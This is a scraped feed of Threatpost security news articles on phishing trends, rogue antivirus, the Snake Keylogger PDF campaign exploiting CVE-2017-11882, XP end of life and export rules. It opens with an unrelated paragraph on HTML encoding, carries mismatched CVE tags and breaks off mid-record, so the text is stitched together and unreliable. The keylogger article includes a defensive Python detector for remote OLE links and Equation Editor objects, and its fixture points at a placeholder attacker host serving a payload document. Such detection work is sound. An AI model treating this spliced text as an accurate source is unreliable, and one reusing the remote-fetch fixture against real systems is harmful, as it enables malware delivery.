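Encoding is context-dependent: HTML entity encoding is the right fix for text and quoted attribute values, which is where this page reflects the value, but a value reflected inside a script block or a URL needs JavaScript-string or URL encoding instead. A result containing only `"` and `'` points at attribute breakout rather than tag injection.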
In total, 18.32 percent of Kaspersky Lab users encountered phishing attempts, researchers said.\n\n\u201cWe have seen a steady increase in phishing attacks on cryptocurrency-related resources, and expect new scams to appear in 2019,\u201d according to the report, by Maria Vergelis, Tatyana Shcherbakova and Tatyana Sidorina with Kaspersky Lab. \u201cDespite the fall in value and the lean times for the cryptocurrency market as a whole, phishers and spammers will try to squeeze everything they can out of this.\u201d\n\n## Current Events: A Go-To Phishing Hook\n\nBad actors continued to rely on an age-old trick in 2018 for phishing attacks: using newsworthy events, such as new smartphone launches, [sales seasons](<https://threatpost.com/threatlist-gift-card-themed-bec-holiday-scams-spike/139716/>), [tax deadlines](<https://threatpost.com/fbi-warns-of-spike-in-w-2-phishing-campaigns/130057/>), and the EU General Data Protection Regulation (GDPR) to hook the victim.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12151936/190311-spam-report-2018-1-e1552418397221.png>)\n\nPhishing emails purporting to be about GDPR, for instance, boomed [in the first few months](<https://threatpost.com/gdpr-phishing-scam-targets-apple-accounts-financial-data/131915/>) of 2018, because during those months there was an upturn in legitimate GDPR mailings warning users of the transition to the new regulation, which requires stringent processes for storing and processing the personal data of European citizens.\n\nAttackers unsurprisingly took advantage of this with their own GDPR-related emails: \u201cIt was generally B2B spam \u2014 mostly invitations to paid seminars, webinars, and workshops promising to explain the ins and outs of the new regulation and its ramifications for business,\u201d said researchers.\n\nOther top events, such as the 2018 [FIFA World Cup](<https://threatpost.com/world-cup-vacation-scams-lead-in-phishing-trips-this-summer/132543/>) and the launch of the new iPhone 
sparked phishing attempts, including emails leading to fake FIFA partner websites for the former, and spam messages purporting to sell accessories and replica gadgets for the latter.\n\n## Cryptocurrency Targets\n\nDespite the cryptocurrency market\u2019s [struggle in 2018](<https://www.cnbc.com/2018/10/12/bitcoin-price-cryptocurrency-market-drops-as-xrp-ethereum-plunge.html>), bad actors\u2019 interest in cryptocurrencies appears far from waning. In fact, scammers utilized a number of methods to capitalize on victims\u2019 interest in the cryptocurrency market, such as posing as a cryptocurrency exchange or a fake Initial Coin Offering (ICO) bent on convincing victims to transfer money to cryptocurrency wallets.\n\n\u201cIn 2018, our Anti-Phishing system prevented 410,786 attempts to redirect users to phishing sites imitating popular cryptocurrency wallets, exchanges and platforms,\u201d researchers said. \u201cFraudsters are actively creating fake login pages for cryptocurrency services in the hope of getting user credentials.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12152522/190311-spam-report-2018-7.png>)\n\nWhen it came to ICOs, scammers invited victims by email and social-media posts to invest in various ICOs.\n\nOne such scam targeted a cryptocurrency called buzcoin; the scammers got hold of the project mailing list and sent fake presale invitations to subscribers before the ICO began \u2013 eventually making off with $15,000, according to Kaspersky Lab.\n\nThere were also sextortion scams that coerced victims into sending cryptocurrency in exchange for keeping quiet about their private online activities, with one campaign in July noted for using victims\u2019 [legitimate password](<https://threatpost.com/sextortionists-shift-scare-tactics-to-include-legit-passwords/133960/>) in the email as a scare tactic; and another one in December hit victims with 
[ransomware](<https://threatpost.com/sextortion-emails-force-payment-via-gandcrab-ransomware/139753/>).\n\nResearchers said they don\u2019t expect attackers\u2019 interest in cryptocurrency to die down any time soon: \u201cIn 2019, spammers will continue to exploit the cryptocurrency topic,\u201d they said. \u201cWe expect to see more fraudulent mailings aimed at both extracting cryptocurrency and gaining access to personal accounts with various cryptocurrency services.\u201d\n\n## Other Tricks\n\nIn 2018, the number of malicious messages in spam was about 1.2 times lower than in 2017, according to researchers. Of those malicious messages, the most widely distributed malicious object in email ([Exploit.Win32.CVE-2017-11882](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>)) exploited a long-patched Microsoft Office vulnerability that allows the attacker to execute arbitrary code.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12152819/malware-phishing.png>)\n\nDespite this downturn in malicious emails, scammers appear to be looking to other sneaky tactics to avoid detection and still make off with victims\u2019 credentials \u2014 in particular using attachment formats that are atypical for spam, such as ISO, IQY, PIF and PUB files.\n\n\u201c2018 saw a continuation of the trend for attention to detail in email presentation,\u201d researchers said. 
\u201cCybercriminals imitated actual business correspondence using the companies\u2019 real details, including signatures and logos.\u201d\n\nIn addition, bad actors appeared to transition to new channels of content distribution beyond email \u2013 including social media sites, services like [Spotify](<https://threatpost.com/spotify-phishers-hijack-music-fans-accounts/139329/>), or even [Google Translate](<https://threatpost.com/clever-phishing-attack-enlists-google-translate-to-spoof-facebook-login-page/141571/>).\n\n\u201cCybercriminals in 2018 used new methods of communication with their \u2018audience,\u2019 including instant messengers and social networks, releasing wave after wave of self-propagating malicious messages,\u201d said researchers. \u201cHand-in-hand with this, as illustrated by [an] attack on universities, fraudsters are seeking not only new channels, but new targets as well.\u201d\n", "cvss3": {}, "published": "2019-03-12T20:48:20", "type": "threatpost", "title": "ThreatList: Phishing Attacks Doubled in 2018", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-03-12T20:48:20", "id": "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "href": "https://threatpost.com/threatlist-phishing-attacks-doubled-in-2018/142732/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:06:15", "description": "We\u2019ve noted for a while that the practices of rogue antivirus software have started to mimic those of legitimate antivirus software vendors. But a new version of the FakeXPA scareware takes things a bit further: posing as a legitimate commercial AV package, AVG Antivirus 2011. 
\n\nMicrosoft\u2019s Malware Protection Center [issued a warning for the phony AVG program on Monday](<http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=AVGAntivirus2011>), noting that the application is standard-issue scareware that claims to scan for malware, displays fake \u2018detection\u2019 warnings about infections, then asks for money to remove the non-existent malware. Like other scareware, FakeXPA is known, in some cases, to install its own malware \u2013 variants of the Alureon Trojan horse program.\n\nScreen shots of the FakeXPA malware show a legitimate-seeming GUI with the AVG Anti Virus logo prominently displayed. AVG Antivirus 2011 is one of many names used by the malware, with small variations in branding and user interface distinguishing each.\n\nRogue antivirus has blossomed into a multimillion-dollar business in the last decade, using aggressive promotion techniques like search engine optimization and web-based pop-up ads to trick unwitting Web surfers into downloading scareware.\n\nCo-opting a legitimate product\u2019s name and logo is just the latest in a series of steps by rogue anti-malware vendors to mirror the features and actions of legitimate antivirus software makers. In addition, fake AV firms have also introduced services like localization, [online customer support](<https://threatpost.com/pulling-back-curtain-rogue-av-tech-support-071210/>) (with real humans!) and even [AV-Test like product benchmarking](<https://threatpost.com/rise-rogue-av-testers-070910/>) to serve their \u201ccustomers\u201d and increase profits. 
\n", "cvss3": {}, "published": "2011-02-01T20:37:43", "type": "threatpost", "title": "Fake AVG: Scam Software Cops Name and Logo of Real AV", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:15", "id": "THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F", "href": "https://threatpost.com/fake-avg-scam-software-cops-name-and-logo-real-av-020111/74899/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-23T13:53:38", "description": "While most malicious e-mail campaigns use Word documents to hide and spread malware, a recently discovered campaign uses a malicious PDF file and a 22-year-old Office bug to propagate the Snake Keylogger malware, researchers have found.\n\nThe campaign\u2014discovered by researchers at HP Wolf Security\u2014aims to dupe victims with an attached PDF file purporting to have information about a remittance payment, according to [a blog post](<https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/>) published Friday. Instead, it loads the info-stealing malware, using some tricky evasion tactics to avoid detection.\n\n\u201cThe reasons are clear: users are familiar with these file types, the applications used to open them are ubiquitous, and they are suited to social engineering lures,\u201d he wrote.\n\nStill, while the new campaign does use PDF in the file lure, it later employs Microsoft Word to deliver the ultimate payload\u2014the Snake Keylogger, researchers found. 
Snake Keylogger is .NET-based malware that first appeared in late 2020 and is aimed at stealing sensitive information from a victim\u2019s device, including saved credentials, keystrokes, screenshots and clipboard data, [according to Fortinet](<https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware>).\n\n## **\u2018Unusual\u2019 Campaign**\n\nThe HP Wolf Security team noticed a new PDF-based threat campaign on March 23 with an \u201cunusual infection chain,\u201d involving not just a PDF but also \u201cseveral tricks to evade detection, such as embedding malicious files, loading remotely-hosted exploits and shellcode encryption,\u201d Schlapfer wrote.\n\nAttackers target victims with emails that include a PDF document named \u201cREMMITANCE INVOICE.pdf\u201d\u2014misspelling intended\u2014as an attachment. If someone opens the file, Adobe Reader prompts the user to open a .docx file with a rather curious name, researchers found.\n\n\u201cThe attackers sneakily named the Word document \u201chas been verified. However PDF, Jpeg, xlsx, .docx\u201d to make it look as though the file name was part of the Adobe Reader prompt,\u201d according to the post.\n\nThe .docx file is stored as an EmbeddedFile object within the PDF, and opens Microsoft Word if clicked on, researchers found. 
If Protected View is disabled, Word downloads a Rich Text Format (.rtf) file from a web server, which is then loaded in the context of the open document.\n\nResearchers unzipped the .docx, which as an Office Open XML file is a ZIP archive, and found the download URL in its \u201c_document.xml.rels_\u201d relationships file; the domain was not one legitimately referenced from Office documents, they said.\n\n## **17-Year-Old Bug Exploited**\n\nConnecting to this URL leads to a redirect and then downloads an RTF document called \u201c_f_document_shp.doc_.\u201d This document contained two \u201cnot well-formed\u201d OLE objects that revealed shellcode exploiting [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>), which researchers said is an \u201cover four-years-old\u201d remote code execution (RCE) vulnerability in Equation Editor.\n\nEquation Editor is an app installed by default with the Office suite that\u2019s used to insert and edit complex equations as Object Linking and Embedding (OLE) items in Microsoft Word documents.\n\nThe bug that attackers leverage in the campaign is one that Microsoft patched more than four years ago, [in 2017](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>), but it had already existed for some 17 years before the patch, making the vulnerable code 22 years old now.\n\nAs the final act of the attack, researchers found shellcode stored in the \u201c_OLENativeStream_\u201d structure at the end of one of the OLE objects they examined. 
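Two of the artifacts in this chain can be checked mechanically before anything is opened: the external relationship in the .docx that makes Word fetch the RTF, and the Equation Editor OLE object inside the RTF. The following is an added example, my own triage code rather than HP Wolf Security\u2019s tooling: it lists every `TargetMode="External"` relationship in an Office Open XML package and flags the ones Word resolves on open, and it extracts the class names of OLE objects embedded in an RTF. The sample .docx and RTF are constructed in the block and the attacker host is a placeholder; the list of auto-fetched relationship types and the `Equation.3` ProgID are assumptions drawn from the Office and RTF formats, not from the article.

```python
# Added example: my own triage code for the chain described above, not HP Wolf
# Security's tooling. The sample .docx and RTF are constructed here; the host is
# a placeholder. "Equation.3" is the Equation Editor ProgID as it appears in RTF
# \objclass groups, known from the formats rather than from the article.
import io
import re
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import urlsplit

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Relationship types Word resolves while opening the document, without a click
# (assumed list for this example; hyperlinks are deliberately excluded).
AUTO_FETCH_TYPES = {"attachedTemplate", "oleObject", "frame", "image"}
OBJCLASS_RE = re.compile(rb"\\objclass\s*([A-Za-z0-9_.]+)")


def external_targets(docx_bytes: bytes) -> list:
    """(relationship type, target) for every TargetMode="External" relationship
    in every .rels part of the Office Open XML package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((rtype, rel.get("Target", "")))
    return found


def auto_fetched_remote_targets(docx_bytes: bytes) -> list:
    """External HTTP(S) targets Word would fetch on open: the document.xml.rels
    URL in the article is exactly this kind of entry."""
    return [(t, target) for t, target in external_targets(docx_bytes)
            if t in AUTO_FETCH_TYPES and urlsplit(target).scheme in ("http", "https")]


def rtf_object_classes(rtf_bytes: bytes) -> list:
    """Class names of embedded OLE objects, e.g. {\\*\\objclass Equation.3}."""
    return [m.group(1).decode("ascii") for m in OBJCLASS_RE.finditer(rtf_bytes)]


def rtf_has_equation_object(rtf_bytes: bytes) -> bool:
    return any(c.lower().startswith("equation") for c in rtf_object_classes(rtf_bytes))


def build_sample_docx(target: str) -> bytes:
    """Constructed minimal package whose document.xml.rels links a remote OLE object."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml",
                     '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        pkg.writestr("word/document.xml",
                     '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        pkg.writestr("word/_rels/document.xml.rels",
                     f'<Relationships xmlns="{RELS_NS}">'
                     '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
                     f'<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="{target}" TargetMode="External"/>'
                     '</Relationships>')
    return buf.getvalue()


# Constructed RTF fragment with one embedded Equation Editor object (dummy objdata hex).
SAMPLE_RTF = rb"{\rtf1{\object\objemb{\*\objclass Equation.3}{\*\objdata 0105000002000000}}}"

if __name__ == "__main__":
    doc = build_sample_docx("http://attacker.example/f_document_shp.doc")  # placeholder host
    print("remote targets fetched on open:", auto_fetched_remote_targets(doc))
    print("RTF OLE classes:", rtf_object_classes(SAMPLE_RTF),
          "-> Equation Editor:", rtf_has_equation_object(SAMPLE_RTF))
```

Real samples are often obfuscated: the `\objclass` group may be omitted with only the CLSID left in `\objdata`, control words may be split with whitespace or nested groups, and `\objupdate` is used to force the object to load. Treat the RTF check as one signal among several and match the CLSID bytes in `\objdata` as well.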
The code eventually decrypts a ciphertext that turns out to be more shellcode, which is then executed and leads to an executable called _fresh.exe_ that loads the Snake Keylogger, researchers found.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-23T12:07:56", "type": "threatpost", "title": "Snake Keylogger Spreads Through Malicious PDFs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2022-05-23T12:07:56", "id": "THREATPOST:384A1D8040B61120BE2BA529493B9871", "href": "https://threatpost.com/snake-keylogger-pdfs/179703/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:05:59", "description": "Dennis Fisher talks with Microsoft\u2019s Katie Moussouris about the way that the Trustworthy Computing effort at Microsoft has changed, how the security community has evolved since she got involved in the 1990s and the challenges\u2013and fun\u2013of being a woman in security.\n\n*Podcast audio 
courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)*\n\nSubscribe to the Digital Underground podcast on [iTunes](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n", "cvss3": {}, "published": "2011-03-16T15:12:29", "type": "threatpost", "title": "Katie Moussouris on Microsoft, Trustworthy Computing and the Evolution of the Security Community", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-24T18:59:56", "id": "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "href": "https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/75032/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:04", "description": "Windows XP security support ends Tuesday, and until now most of the public hand-wringing over XP\u2019s end-of-life has been about the potential for malware outbreaks against unpatched vulnerabilities that have been [stockpiled by hackers](<http://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252>) anxiously awaiting April 8, 2014.\n\nBut what about vulnerabilities in XP that have been responsibly shared with Microsoft and won\u2019t be fixed? Those too are perpetual zero-days after Tuesday.\n\nMicrosoft has made huge strides in developing trusted relationships with security researchers who are actively submitting bugs to Microsoft across its product lines. For Microsoft\u2019s part, it has done outreach to researchers, clarified disclosure policies and processes and established [bounty programs for bypasses of innate Windows mitigations](<http://threatpost.com/microsofts-bug-bounty-program-and-the-law-of-unintended-consequences/101038>).\n\nAnd Microsoft isn\u2019t to be faulted for its business decision made long ago to end extended support for XP that includes security patches. 
Yet the fact remains that whatever XP systems remain in circulation after tomorrow will be exposed, and that brings up questions, such as: How will white or gray hats respond? For example, will there be a firestorm of public disclosures in the coming weeks?\n\n\u201cI know a subset of people who have disclosed stuff [in XP] to Microsoft that has not been patched, and that\u2019s given what I know. I\u2019m sure there\u2019s more I don\u2019t know of,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cI wouldn\u2019t encourage researchers to publicly disclose their research because they think that might make Microsoft issue a patch, because that\u2019s not going to happen. The only result is that it would increase the exposure for people at large.\n\n\u201cIt\u2019s a muddy bit of water,\u201d Barrett said. \u201cMicrosoft has been good about dealing with researchers who have been doing the right thing by following responsible disclosure procedures, but now they\u2019re not seeing action.\u201d\n\nMicrosoft did not respond to a request for comment in time for publication.\n\nHP\u2019s Zero Day Initiative, which buys vulnerabilities and exploits from researchers and shares them first with customers and then the affected vendor, has [203 advisories pending public disclosure](<http://www.zerodayinitiative.com/advisories/upcoming/>) listed on its website, 54 of which are Microsoft vulnerabilities going back a year. The website doesn\u2019t list the specific Microsoft product affected, but Microsoft has more than any other major vendor on the list.\n\n\u201cI\u2019m sure there\u2019s tons of stuff still out there; some of it is design flaw stuff that Microsoft can\u2019t fix or never got around to it,\u201d Barrett said. 
\u201cI\u2019m sure there\u2019s a backlog of stuff, but the clock has run out on XP.\u201d\n\nMicrosoft has already announced its final XP patch, a fix for a zero-day in Word that will be available Tuesday (Office 2003 support also ends Tuesday). The fear among some experts is that hackers will look at Microsoft security bulletins for vulnerabilities in supported products and trace those back to their potential exploitability in XP.\n\n\u201cAbsolutely hackers do that,\u201d Barrett said. \u201cIf you\u2019ve got a vulnerability in this file, they\u2019ll track it back to a particular DLL and see that it\u2019s been part of the OS since 2002 and not updated since 2004, they\u2019ll know it\u2019s vulnerable.\n\n\u201cYou might see a golden age of XP vulnerabilities for the next four to six months when adoption of XP is still relatively high and countermeasures are no longer in place. Then you\u2019ll start to see it fade as it\u2019s less used.\u201d\n\nQualys CTO Wolfgang Kandek has been tracking XP use in certain industries through the company\u2019s vulnerability scanner. Financial institutions still have the highest use of XP at 21 percent, followed by transportation at 14 percent (though this has dropped from 55 percent 12 months ago). Retail, another industry run ragged by hackers, is also at 14 percent. Support for Windows XP Embedded, which runs inside a number of consumer and commercial devices in these industries, does not run out until Jan. 12, 2016.\n\n\u201cThis is an additional weakness for these (retail) systems,\u201d Kandek said. \u201cThere are already problems with remote management, default passwords that work everywhere, a bunch of things that were done to make management easier that were not configured well. This just adds to it.\u201d\n\nKandek said that roughly 70 percent of vulnerabilities that were patched in 2013 were found in Windows 8 through XP.\n\n\u201cI don\u2019t see why that would stop in May, June or July. 
Attackers can use that knowledge as a pointer into XP to find if a vulnerability exists. It\u2019s an accelerator for them. My feeling is that after two or three months, there will be tools in public that reliably exploit XP. I can definitely see how that would make an attacker\u2019s work much easier.\u201d\n", "cvss3": {}, "published": "2014-04-08T06:03:54", "type": "threatpost", "title": "Unpatched Bugs, Windows XP End of Life and Public Disclosure", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-08T00:08:09", "id": "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "href": "https://threatpost.com/the-muddy-waters-of-xp-end-of-life-and-public-disclosures/105295/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "There is a newly discovered vulnerability in both Internet Explorer 6 and Internet Explorer 7 that could enable an attacker to take complete control of a vulnerable machine.\n\nThe vulnerability is the result of a dangling pointer in IE, and a proof-of-concept exploit for the flaw is circulating online. The flaw lies in the way that Internet Explorer handles CSS data. [CSS](<http://www.w3.org/Style/CSS/>) is a technology that\u2019s used in many sites to help present information in an organized manner. Specifically, the vulnerability is in mshtml.dll, the Microsoft HTML Viewer.\n\nAccording to an [analysis by Vupen Security](<http://www.vupen.com/english/advisories/2009/3301>), an attacker could exploit the flaw either to crash a vulnerable version of IE, or to run arbitrary code on the user\u2019s machine. There is no patch available for the vulnerability. 
The SANS Internet Storm Center also has an analysis up.\n\nA vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by attackers to compromise a vulnerable system. This issue is caused by a dangling pointer in the Microsoft HTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via the \u201cgetElementsByTagName()\u201d method, which could allow attackers to crash an affected browser or execute arbitrary code by tricking a user into visiting a malicious web page.\n\nAn [exploit for the vulnerability in IE](<http://www.securityfocus.com/archive/1/507984/30/0/threaded>) was published on the Bugtraq mailing list Friday, but experts say it is not very reliable at this point. However, the level of detail included in the Bugtraq post will likely lead to the release of a more reliable exploit soon. In lieu of a patch, users should disable JavaScript in IE to prevent exploitation.\n\nMicrosoft has not yet published any advisories on the new IE vulnerability.\n", "cvss3": {}, "published": "2009-11-22T21:47:10", "type": "threatpost", "title": "New Zero-Day Flaw Discovered in IE7", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:05:16", "id": "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "href": "https://threatpost.com/new-zero-day-flaw-discovered-ie7-112209/73151/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:03", "description": "A security researcher from nCircle is accusing Microsoft of gamesmanship in its description of an unpatched IIS vulnerability in the way the WebDAV extension decodes a requested URL. 
The end result is that a successful exploit would allow a hacker to bypass authentication and gain unauthorized access to resources.\n\n\u201cMicrosoft has classified this issue two different ways in two different places,\u201d he said. \u201c[On the SRD blog ](<http://blogs.technet.com/srd/archive/2009/05/18/more-information-about-the-iis-authentication-bypass.aspx>)(it) refers to this as a Information Disclosure vulnerability, while [the Microsoft Advisory ](<http://www.microsoft.com/technet/security/advisory/971492.mspx>)refers to this as an elevation of privilege,\u201d says nCircle\u2019s Tyler Reguly.\n\nThe point, he said, is that the bug should be called what it is\u2013an access control breach or an authentication bypass. SRD acknowledges the Authentication Bypass but downplays it because you are accessing a single page with the anonymous user privileges, he added.\n\n[Read the full story](<http://securitywatch.eweek.com/browsers/security_researcher_microsoft_downplaying_iis_vulnerability.html?kc=rss>) [eweek.com]\n\nHere\u2019s [our previous coverage](<https://threatpost.com/microsoft-accused-downplaying-iis-flaw-052009/>) of this issue.\n", "cvss3": {}, "published": "2009-05-21T00:03:55", "type": "threatpost", "title": "Microsoft accused of downplaying IIS flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:07", "id": "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "href": "https://threatpost.com/microsoft-accused-downplaying-iis-flaw-052009/72754/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "description": "The commenting period regarding the [Wassenaar Arrangement](<https://threatpost.com/head-scratching-begins-on-proposed-wassenaar-export-control-rules/112959>) expired on Monday but the echo chamber around the largely maligned proposal continues to reverberate. 
Several stakeholders implicated in the proposal added their voices to that chamber on Friday morning, urging the government to revise particulars of the proposal that they believe will ultimately constrain security research and severely hamper day-to-day operations at multiple security firms.\n\nLegal representatives from Microsoft, FireEye, Symantec, and security experts from other companies discussed the arrangement Friday morning during a panel, \u201cDecoding the BIS Proposed Rule for Intrusion Software Platforms,\u201d at the Center for Strategic & International Studies in Washington.\n\nCristin Goodwin, a senior attorney for Microsoft, warned that in its current incarnation the Commerce Department\u2019s implementation of Wassenaar would bring research at the company, most of which follows the sun\u2013going country to country in real time\u2013to a screeching halt.\n\nGoodwin claimed the rules don\u2019t make sense for companies who do this kind of work regularly, pointing out that they\u2019d especially impede the reverse engineering of malware, something researchers at Microsoft do daily.\n\n\u201cTo be able to understand [malware] \u2014 what it is, what it does, you\u2019d have to go get a license. How do you define or describe this category? If you\u2019re looking to articulate what this is, you\u2019re bringing into scope the everyday activities of security companies here,\u201d Goodwin said.\n\nUnder the Wassenaar proposal, brought forth by the U.S. Department of Commerce\u2019s Bureau of Industry and Security (BIS) back in May, the export of what BIS refers to as intrusion software would be tightened. Many companies would be forced to request export licenses to carry out certain research activities, something that many security officials believe would work against the idea of information sharing.\n\nThe issue has been a largely one-sided one. 
Vagaries in the rule\u2019s wording have many believing that under Wassenaar, export control authorities, not vulnerability researchers, will dictate the tempo of legitimate research and exploit development. As it stands, the rules, already adopted by the EU, aim to curb intrusion software like FinFisher and Hacking Team\u2019s Remote Control System.\n\nOfficials at Google [called out the arrangement on Monday](<https://threatpost.com/google-calls-proposed-u-s-wassenaar-rules-not-feasible/113865>), insisting the rules aren\u2019t feasible and would have a \u201csignificant negative impact\u201d on security research, possibly requiring the company to request thousands or tens of thousands of export licenses for its research.\n\nLaura Galante, the director of threat intelligence at FireEye, echoed those sentiments Friday morning, saying that like Google, her company\u2019s research team would have to file for tens of thousands of licenses and that they\u2019d likely also be working against the presumption of denial, something that could eventually breed a defeatist \u201cdon\u2019t bother\u201d mentality.\n\nKatie Moussouris, chief policy officer at HackerOne, was one of the first to [publish her feelings](<https://threatpost.com/security-researchers-sound-off-on-proposed-us-wassenaar-rules/113023>) on the proposed rules. On Friday, she described to the panel how companies that specialize in cybersecurity defense would be more harmed by Wassenaar than those who cater to offense. Moussouris described how Microsoft, her former employer \u2013 and [bug bounty companies](<https://threatpost.com/bug-bounties-in-crosshairs-of-proposed-us-wassenaar-rules/113204>) like HackerOne \u2013 have benefited from bounty programs that wouldn\u2019t have been able to flourish under the proposed agreement. 
Specifically Moussouris referenced the success of Microsoft\u2019s Mitigation Bypass Bounty program.\n\n\u201cThe reason why that bounty program exists is because the only other way that a company like Microsoft can learn about new exploitation techniques was through actual attacks. Providing a defensive incentive to bring those forward earlier gives Microsoft a head start in defense,\u201d Moussouris said. \u201cThat program was launched a few months before Wassenaar added those rules.\u201d\n\n\u201cMicrosoft has awarded that bounty five times in the past two years. That\u2019s five times that Microsoft has gained access to technology that\u2019s regulated in this proposal and five times that Microsoft would have not had access to that information to build a more secure operating system,\u201d Moussouris said. \u201cThis is a concrete example of how this regulation impacts defense.\u201d\n\n> .[@msftsecurity](<https://twitter.com/msftsecurity>)'s bug bounty program implemented in the last 2 yrs wouldn't have happened under the proposed rule \u2013 [@k8em0](<https://twitter.com/k8em0>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624575567761940480>)\n\nIn the end, rules may actually prove fruitless, Stewart Baker, a partner at Steptoe & Johnson LLP, said during the panel. 
Baker remarked that many of the more serious and restrictive Wassenaar rules date back to the Cold War, and admitted that relying on criminal prosecution might be a better move.\n\n> Relying on criminal prosecution may be a more effective method in achieving what we want than regulation \u2013 [@stewartbaker](<https://twitter.com/stewartbaker>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624587322311471105>)\n\n\u201cNo export control regime is going to have any impact on the bad guys, they already have the tools,\u201d Baker said.\n\n\u201cWhat we\u2019re looking at here is the U.S. taking unilateral control of its tech industry,\u201d Baker said.\n", "cvss3": {}, "published": "2015-07-24T13:29:14", "type": "threatpost", "title": "Stakeholders Argue Against Restrictive Wassennaar Proposal", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-07-30T14:08:12", "id": "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "href": "https://threatpost.com/stakeholders-argue-against-restrictive-wassennaar-proposal/113941/", "cvss": {"score": 9.3, "vector": 